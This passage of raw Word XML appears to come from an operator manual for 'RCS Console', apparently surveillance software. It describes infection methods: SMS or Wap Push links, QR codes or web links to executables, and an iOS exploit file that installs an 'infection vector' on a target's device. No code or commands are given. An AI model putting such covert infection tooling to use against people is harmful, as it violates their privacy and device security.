            <wp:effectExtent l="0" t="0" r="825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634565" w:rsidRPr="002D7F2D" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRPr="002D7F2D" w:rsidRDefault="00117549" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.4</w:t>
      </w:r>
      <w:r w:rsidR="00634565" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00634565" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="00634565" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00634565" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="00634565" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00634565" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="00634565" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="00634565">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Melted Application</w:t>
      </w:r>
      <w:r w:rsidR="00634565" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Depending on the Target’s platform, may be available sub-parameters to customize the infection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These sub-parameters will be explained in detail during the training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc372642520"/>
      <w:r w:rsidRPr="004964C2">
        <w:lastRenderedPageBreak/>
        <w:t>Wap Push Message Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A26424">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Wap Push Message Agent allows to </w:t>
      </w:r>
      <w:r w:rsidR="004964C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">send a Wap message or an SMS to the Target’s device, containing a direct link to an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">executable file suitable for the </w:t>
      </w:r>
      <w:r w:rsidR="004964C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>platform that will install the infection vector on the Target’s device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRPr="002D7F2D" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Wap Push Message Agent is available for 4 platforms: Android, BlackBerry, Symbian and Windows Mobile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRPr="002D7F2D" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRPr="002D7F2D" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4050000" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="825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3E0ADB" w:rsidRPr="002D7F2D" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRPr="002D7F2D" w:rsidRDefault="00117549" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.5</w:t>
      </w:r>
      <w:r w:rsidR="003E0ADB" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="003E0ADB" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="003E0ADB" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="003E0ADB" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="003E0ADB" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="003E0ADB" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="003E0ADB" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="003E0ADB">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wap Push Message</w:t>
      </w:r>
      <w:r w:rsidR="003E0ADB" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Depending on the Target’s platform, may be available sub-parameters to customize the infection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0ADB" w:rsidRDefault="003E0ADB" w:rsidP="003E0ADB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These sub-parameters will be explained in detail during the training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc372642521"/>
      <w:r w:rsidRPr="006837AC">
        <w:lastRenderedPageBreak/>
        <w:t>QR Code / Web Link Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A26424">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QR Code / Web Link Agent allows to create a QR Code image and a Web link, both linked to an executable file suitable for the Target’s platform that will install the infection vector on the Target’s device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRPr="002D7F2D" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The QR Code / Web Link Agent is available for 4 platforms: Android, BlackBerry, Symbian and Windows Mobile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRPr="002D7F2D" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRPr="002D7F2D" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4050000" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="825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6837AC" w:rsidRPr="002D7F2D" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRPr="002D7F2D" w:rsidRDefault="00117549" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.6</w:t>
      </w:r>
      <w:r w:rsidR="006837AC" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="006837AC" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="006837AC" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="006837AC" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="006837AC" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="006837AC" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="006837AC" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="006837AC">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QR Code / Web Link</w:t>
      </w:r>
      <w:r w:rsidR="006837AC" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Depending on the Target’s platform, may be available sub-parameters to customize the infection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006837AC" w:rsidRDefault="006837AC" w:rsidP="006837AC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These sub-parameters will be explained in detail during the training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0056000A" w:rsidRDefault="0056000A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0056000A" w:rsidRDefault="0056000A" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc372642522"/>
      <w:r w:rsidRPr="00BE4E64">
        <w:lastRenderedPageBreak/>
        <w:t>Exploit Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="0056000A" w:rsidRDefault="0056000A" w:rsidP="0056000A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE4E64" w:rsidRDefault="00BE4E64" w:rsidP="00BE4E64">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploit Agent allows to create an executable file suitable for the selected platform that will install the infection vector on the Target’s device as soon as the file is opened, exploiting specific software vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4E64" w:rsidRDefault="00BE4E64" w:rsidP="00BE4E64">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE4E64" w:rsidRPr="002D7F2D" w:rsidRDefault="00BE4E64" w:rsidP="00BE4E64">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Exploit Agent is available for 1 platform: iOS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4E64" w:rsidRPr="002D7F2D" w:rsidRDefault="00BE4E64" w:rsidP="00BE4E64">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE4E64" w:rsidRPr="002D7F2D" w:rsidRDefault="00BE4E64" w:rsidP="00BE4E64">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4050000" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="825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050000" cy="3240000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE4E64" w:rsidRPr="002D7F2D" w:rsidRDefault="00BE4E64" w:rsidP="00BE4E64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE4E64" w:rsidRPr="002D7F2D" w:rsidRDefault="00117549" w:rsidP="00BE4E64">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.7</w:t>
      </w:r>
      <w:r w:rsidR="00BE4E64" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00BE4E64" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="00BE4E64" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00BE4E64" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="00BE4E64" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00BE4E64" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="00BE4E64" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="00BE4E64">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r w:rsidR="00BE4E64" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
